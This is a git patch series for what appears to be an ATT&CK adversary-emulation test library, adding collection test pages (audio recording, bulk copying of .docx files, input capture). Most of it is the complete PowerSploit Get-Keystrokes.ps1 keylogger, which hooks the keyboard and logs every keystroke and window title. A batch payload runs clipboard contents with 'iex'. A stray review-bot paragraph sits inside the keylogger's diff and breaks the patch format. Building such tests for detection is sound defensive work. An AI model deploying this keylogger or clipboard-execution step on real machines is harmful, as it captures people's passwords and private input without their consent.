From 34dd80d94b2f4ab4db7822f422e359d610f157b2 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Thu, 12 Oct 2017 15:05:28 -0700 Subject: [PATCH 1/3] Initial Commit + Audio Capture + Automated Collection + Input Capture + collection bat + Payload + Updated Matrix --- Windows/Collection/Audio_Capture.md | 13 + Windows/Collection/Automated_Collection.md | 23 ++ Windows/Collection/Input_Capture.md | 13 + Windows/Payloads/Collection.bat | 4 + .../Payloads/Collection/Get-Keystrokes.ps1 | 377 ++++++++++++++++++ Windows/Windows.md | 6 +- 6 files changed, 433 insertions(+), 3 deletions(-) create mode 100644 Windows/Collection/Audio_Capture.md create mode 100644 Windows/Collection/Automated_Collection.md create mode 100644 Windows/Collection/Input_Capture.md create mode 100644 Windows/Payloads/Collection.bat create mode 100644 Windows/Payloads/Collection/Get-Keystrokes.ps1 diff --git a/Windows/Collection/Audio_Capture.md b/Windows/Collection/Audio_Capture.md new file mode 100644 index 00000000..7cbcf534 --- /dev/null +++ b/Windows/Collection/Audio_Capture.md @@ -0,0 +1,13 @@ +# Audio Capture + +MITRE ATT&CK Technique: [T1123](https://attack.mitre.org/wiki/Technique/T1123) + +## cmd.exe + +Create a file called test.wma, with the duration of 30 seconds: + + SoundRecorder /FILE test.wma /DURATION 0000:00:30 + +## PowerShell + +PowerShell Cmdlet - [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) diff --git a/Windows/Collection/Automated_Collection.md b/Windows/Collection/Automated_Collection.md new file mode 100644 index 00000000..879c677e --- /dev/null +++ b/Windows/Collection/Automated_Collection.md 
@@ -0,0 +1,23 @@ +# Automated Collection + +MITRE ATT&CK Technique: [T1119](https://attack.mitre.org/wiki/Technique/T1119) + +## cmd.exe + +### find: +Input: + + dir c: /b /s .docx | findstr /e .docx + +### copy: +Input: + + for /R c: %f in (*.docx) do copy %f c:\temp\ + +## PowerShell + +Find and copy + +Input: + + powershell Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} diff --git a/Windows/Collection/Input_Capture.md b/Windows/Collection/Input_Capture.md new file mode 100644 index 00000000..67a26d01 --- /dev/null +++ b/Windows/Collection/Input_Capture.md @@ -0,0 +1,13 @@ +# Input Capture + +MITRE ATT&CK Technique: [T1056](https://attack.mitre.org/wiki/Technique/T1056) + +## PowerShell + +### Get-Keystrokes.ps1 + +[Payload](Payloads/Collection/Get-keystrokes.ps1) provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) + +Input: + + Get-Keystrokes -LogPath C:\key.log diff --git a/Windows/Payloads/Collection.bat b/Windows/Payloads/Collection.bat new file mode 100644 index 00000000..90024da0 --- /dev/null +++ b/Windows/Payloads/Collection.bat @@ -0,0 +1,4 @@ +SoundRecorder /FILE test.wma /DURATION 0000:00:30 +echo Get-Process > process-information.txt +powershell +Get-Clipboard | iex diff --git a/Windows/Payloads/Collection/Get-Keystrokes.ps1 b/Windows/Payloads/Collection/Get-Keystrokes.ps1 new file mode 100644 index 00000000..03ba72c1 --- /dev/null +++ b/Windows/Payloads/Collection/Get-Keystrokes.ps1 
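Review bot: `powershell` on line 3 of Collection.bat starts an interactive session, so line 4 only runs once that session exits, and it then runs under cmd.exe, where `Get-Clipboard` is not a command; line 2 likewise only writes the literal text `Get-Process` to `process-information.txt` and never places anything on the clipboard, so the clipboard step cannot succeed as written. Patch 2/3 of this series corrects the same sequence in Clipboard_Data.md to pipe the text through `clip` and run `Get-Clipboard | iex` from PowerShell; the .bat should be brought in line with that page so the documented test and the payload behave identically. The script also leaves `test.wma` and `process-information.txt` in the working directory with no cleanup step, which a harness running this test should remove afterwards. Each line here is an artifact worth noting for detection — the `SoundRecorder /FILE ... /DURATION` command line and PowerShell invoking `Invoke-Expression` on clipboard contents — and a short comment in the file stating which of the referenced ATT&CK techniques (T1123, T1115) each line is meant to exercise would make the payload self-describing.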
@@ -0,0 +1,377 @@ +function Get-Keystrokes { +<# +.SYNOPSIS + + Logs keys pressed, time and the active window. + + PowerSploit Function: Get-Keystrokes + Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) + Revised By: Jesse Davis (@secabstraction) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.PARAMETER LogPath + + Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. + +.PARAMETER Timeout + + Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. + +.PARAMETER PassThru + + Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. + +.EXAMPLE + + Get-Keystrokes -LogPath C:\key.log + +.EXAMPLE + + Get-Keystrokes -Timeout 20 + +.LINK + + http://www.obscuresec.com/ + http://www.exploit-monday.com/ + https://github.com/secabstraction +#> + [CmdletBinding()] + Param ( + [Parameter(Position = 0)] + [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})] + [String]$LogPath = "$($env:TEMP)\key.log", + + [Parameter(Position = 1)] + [Double]$Timeout, + + [Parameter()] + [Switch]$PassThru + ) + + $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) + + try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode } + catch { throw $_ } + + $Script = { + Param ( + [Parameter(Position = 0)] + [String]$LogPath, + + [Parameter(Position = 1)] + [Double]$Timeout + ) + + function local:Get-DelegateType { + Param ( + [OutputType([Type])] + + [Parameter( Position = 0)] + [Type[]] + $Parameters = (New-Object Type[](0)), + + [Parameter( Position = 1 )] + [Type] + $ReturnType = [Void] + ) + + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate') + $AssemblyBuilder = 
$Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) + $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) + $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') + $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) + $MethodBuilder.SetImplementationFlags('Runtime, Managed') + + $TypeBuilder.CreateType() + } + function local:Get-ProcAddress { + Param ( + [OutputType([IntPtr])] + + [Parameter( Position = 0, Mandatory = $True )] + [String] + $Module, + + [Parameter( Position = 1, Mandatory = $True )] + [String] + $Procedure + ) + + # Get a reference to System.dll in the GAC + $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | + Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } + $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') + # Get a reference to the GetModuleHandle and GetProcAddress methods + $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') + $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') + # Get a handle to the module specified + $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) + $tmpPtr = New-Object IntPtr + $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) + + # Return the address of the function + $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) + } + + #region Imports + + [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') + + # SetWindowsHookEx + $SetWindowsHookExAddr = Get-ProcAddress 
user32.dll SetWindowsHookExA + $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr]) + $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate) + + # CallNextHookEx + $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx + $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr]) + $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate) + + # UnhookWindowsHookEx + $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx + $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void]) + $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate) + + # PeekMessage + $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA + $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void]) + $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate) + + # GetAsyncKeyState + $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState + $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16]) + $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate) + + # GetForegroundWindow + $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow + $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr]) + $GetForegroundWindow = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate) + + # GetWindowText + $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA + $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], 
[Int32]) ([Void]) + $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate) + + # GetModuleHandle + $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA + $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) + $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) + + #endregion Imports + + $CallbackScript = { + Param ( + [Parameter()] + [Int32]$Code, + + [Parameter()] + [IntPtr]$wParam, + + [Parameter()] + [IntPtr]$lParam + ) + + $Keys = [Windows.Forms.Keys] + + $MsgType = $wParam.ToInt32() + + # Process WM_KEYDOWN & WM_SYSKEYDOWN messages + if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) { + + $hWindow = $GetForegroundWindow.Invoke() + + $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey) + if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true } + else { $Shift = $false } + + $Caps = [Console]::CapsLock + + # Read virtual-key from buffer + $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam) + + # Parse virtual-key + if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters + if ($Shift -xor $Caps) { $Key = $vKey.ToString() } + else { $Key = $vKey.ToString().ToLower() } + } + elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters + switch ($vKey.value__) { + 96 { $Key = '0' } + 97 { $Key = '1' } + 98 { $Key = '2' } + 99 { $Key = '3' } + 100 { $Key = '4' } + 101 { $Key = '5' } + 102 { $Key = '6' } + 103 { $Key = '7' } + 104 { $Key = '8' } + 105 { $Key = '9' } + 106 { $Key = "*" } + 107 { $Key = "+" } + 108 { $Key = "|" } + 109 { $Key = "-" } + 110 { $Key = "." } + 111 { $Key = "/" } + } + } + elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) { + if ($Shift) { + switch ($vKey.value__) { # Shiftable characters + 48 { $Key = ')' } + 49 { $Key = '!' 
} + 50 { $Key = '@' } + 51 { $Key = '#' } + 52 { $Key = '$' } + 53 { $Key = '%' } + 54 { $Key = '^' } + 55 { $Key = '&' } + 56 { $Key = '*' } + 57 { $Key = '(' } + 186 { $Key = ':' } + 187 { $Key = '+' } + 188 { $Key = '<' } + 189 { $Key = '_' } + 190 { $Key = '>' } + 191 { $Key = '?' } + 192 { $Key = '~' } + 219 { $Key = '{' } + 220 { $Key = '|' } + 221 { $Key = '}' } + 222 { $Key = '' } + } + } + else { + switch ($vKey.value__) { + 48 { $Key = '0' } + 49 { $Key = '1' } + 50 { $Key = '2' } + 51 { $Key = '3' } + 52 { $Key = '4' } + 53 { $Key = '5' } + 54 { $Key = '6' } + 55 { $Key = '7' } + 56 { $Key = '8' } + 57 { $Key = '9' } + 186 { $Key = ';' } + 187 { $Key = '=' } + 188 { $Key = ',' } + 189 { $Key = '-' } + 190 { $Key = '.' } + 191 { $Key = '/' } + 192 { $Key = '`' } + 219 { $Key = '[' } + 220 { $Key = '\' } + 221 { $Key = ']' } + 222 { $Key = '' } + } + } + } + else { + switch ($vKey) { + $Keys::F1 { $Key = '' } + $Keys::F2 { $Key = '' } + $Keys::F3 { $Key = '' } + $Keys::F4 { $Key = '' } + $Keys::F5 { $Key = '' } + $Keys::F6 { $Key = '' } + $Keys::F7 { $Key = '' } + $Keys::F8 { $Key = '' } + $Keys::F9 { $Key = '' } + $Keys::F10 { $Key = '' } + $Keys::F11 { $Key = '' } + $Keys::F12 { $Key = '' } + + $Keys::Snapshot { $Key = '' } + $Keys::Scroll { $Key = '' } + $Keys::Pause { $Key = '' } + $Keys::Insert { $Key = '' } + $Keys::Home { $Key = '' } + $Keys::Delete { $Key = '' } + $Keys::End { $Key = '' } + $Keys::Prior { $Key = '' } + $Keys::Next { $Key = '' } + $Keys::Escape { $Key = '' } + $Keys::NumLock { $Key = '' } + $Keys::Capital { $Key = '' } + $Keys::Tab { $Key = '' } + $Keys::Back { $Key = '' } + $Keys::Enter { $Key = '' } + $Keys::Space { $Key = '< >' } + $Keys::Left { $Key = '' } + $Keys::Up { $Key = '' } + $Keys::Right { $Key = '' } + $Keys::Down { $Key = '' } + $Keys::LMenu { $Key = '' } + $Keys::RMenu { $Key = '' } + $Keys::LWin { $Key = '' } + $Keys::RWin { $Key = '' } + $Keys::LShiftKey { $Key = '' } + $Keys::RShiftKey { $Key = '' } + 
$Keys::LControlKey { $Key = '' } + $Keys::RControlKey { $Key = '' } + } + } + + # Get foreground window's title + $Title = New-Object Text.Stringbuilder 256 + $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity) + + # Define object properties + $Props = @{ + Key = $Key + Time = [DateTime]::Now + Window = $Title.ToString() + } + + $obj = New-Object psobject -Property $Props + + # Stupid hack since Export-CSV doesn't have an append switch in PSv2 + $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1] + + #return results + Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode + } + return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam) + } + + # Cast scriptblock as LowLevelKeyboardProc callback + $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr]) + $Callback = $CallbackScript -as $Delegate + + # Get handle to PowerShell for hook + $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName + $ModuleHandle = $GetModuleHandle.Invoke($PoshModule) + + # Set WM_KEYBOARD_LL hook + $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0) + + $Stopwatch = [Diagnostics.Stopwatch]::StartNew() + + while ($true) { + if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break } + $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0) + Start-Sleep -Milliseconds 10 + } + + $Stopwatch.Stop() + + # Remove the hook + $UnhookWindowsHookEx.Invoke($Hook) + } + + # Setup KeyLogger's runspace + $PowerShell = [PowerShell]::Create() + [void]$PowerShell.AddScript($Script) + [void]$PowerShell.AddArgument($LogPath) + if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) } + + # Start KeyLogger + [void]$PowerShell.BeginInvoke() + + if ($PassThru.IsPresent) { return $PowerShell } +} diff --git a/Windows/Windows.md b/Windows/Windows.md index 28e4348f..e3cccfc9 100644 --- a/Windows/Windows.md +++ b/Windows/Windows.md 
@@ -2,13 +2,13 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated 
Collection](Collection/Automated_Collection.md) | Data Compressed | Communication Through Removable Media | | [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy | | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | | Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Input Capture](Collection/Input_Capture.md) | Permission Groups Discovery | Remote File Copy | 
[PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | | Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | | DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | | External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | From 3c17d14b37492b68099ae4fc0ec7e9325b4a237e Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Mon, 16 Oct 2017 13:19:20 -0700 Subject: [PATCH 2/3] Fixed Clipboard + Missing clip and made it completely compatible with powershell only now. No need to be in cmd.exe to start this. --- Windows/Collection/Clipboard_Data.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Windows/Collection/Clipboard_Data.md b/Windows/Collection/Clipboard_Data.md index 1077bc49..06368836 100644 --- a/Windows/Collection/Clipboard_Data.md +++ b/Windows/Collection/Clipboard_Data.md @@ -11,6 +11,5 @@ MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115) ## PowerShell - echo Get-Process > things.txt - powershell + echo Get-Process | clip Get-Clipboard | iex From cf3f201c940a8521c318b1f045b8d4226ac69331 Mon Sep 17 00:00:00 2001 
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 17 Oct 2017 11:55:57 -0700 Subject: [PATCH 3/3] Fix + Line breaks --- Windows/Collection/Automated_Collection.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Windows/Collection/Automated_Collection.md b/Windows/Collection/Automated_Collection.md index 879c677e..6f377dc8 100644 --- a/Windows/Collection/Automated_Collection.md +++ b/Windows/Collection/Automated_Collection.md @@ -5,11 +5,13 @@ MITRE ATT&CK Technique: [T1119](https://attack.mitre.org/wiki/Technique/T1119) ## cmd.exe ### find: + Input: dir c: /b /s .docx | findstr /e .docx ### copy: + Input: for /R c: %f in (*.docx) do copy %f c:\temp\